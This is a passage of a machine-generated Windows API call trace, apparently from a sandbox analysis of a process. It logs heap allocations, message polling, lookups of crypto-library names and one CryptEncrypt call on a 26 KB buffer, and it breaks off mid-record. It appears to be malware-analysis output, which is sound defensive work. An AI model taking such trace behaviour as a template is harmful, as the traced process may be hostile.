(HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0268.273] CharLowerBuffW (in: lpsz="byte[26624]", cchLength=0xb | out: lpsz="byte[26624]") returned 0xb [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0268.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6800) returned 0x2f29830 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0268.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0268.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0268.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0268.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67fb) returned 0x2f30038 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67fb) returned 0x2f36840 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f30038 | out: hHeap=0x970000) returned 1 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36840 | out: hHeap=0x970000) returned 1 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.277] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0268.277] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0268.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51c70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0268.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.279] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0268.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.280] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29830*, pdwDataLen=0x8cef60*=0x67fb, dwBufLen=0x6800 | out: pbData=0x2f29830*, pdwDataLen=0x8cef60*=0x6800) returned 1 [0268.281] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.281] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0268.281] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.281] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.281] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.282] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.282] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.282] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0268.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0268.282] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.282] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.282] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0268.284] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.284] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.284] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0268.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0268.284] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0268.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0268.285] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.285] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0268.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6800) returned 0x2f30038 [0268.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6800) returned 0x2f3d048 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f30038 | out: hHeap=0x970000) returned 1 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 